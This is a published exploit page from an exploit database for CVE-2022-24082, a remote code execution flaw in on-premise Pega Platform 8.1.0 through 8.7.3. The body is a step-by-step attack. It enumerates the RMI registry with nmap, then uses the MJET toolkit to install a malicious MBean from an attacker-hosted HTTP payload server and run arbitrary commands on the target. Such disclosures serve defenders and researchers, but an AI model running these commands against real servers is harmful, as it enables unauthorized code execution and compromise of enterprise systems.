Pega Platform 8.7.3 Remote Code Execution

2022.10.24
pl Marcin Wolak (PL) pl
Risk: High
Local: No
Remote: Yes
CVE: CVE-2022-24082
CWE: N/A

# Exploit Title: Pega Platform 8.1.0 (and higher) Remote Code Execution # Google Dork: N/A # Date: 20 Oct 2022 # Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit) # Vendor Homepage: www.pega.com # Software Link: Not Available # Version: 8.1.0 on-premise and higher, up to 8.7.3 # Tested on: Red Hat Enterprise 7 # CVE : CVE-2022-24082 ;Dumping RMI registry: nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address> ;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1:<PORT>) ;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well): nmap -sT -sV -p <PORT> <IP Address> ;Exploitation requires: ;- JVM ;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet) ;- jython ;Installing mbean for remote code execution java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666 ;Execution of commands id & ifconfig java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig" ;More details: https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top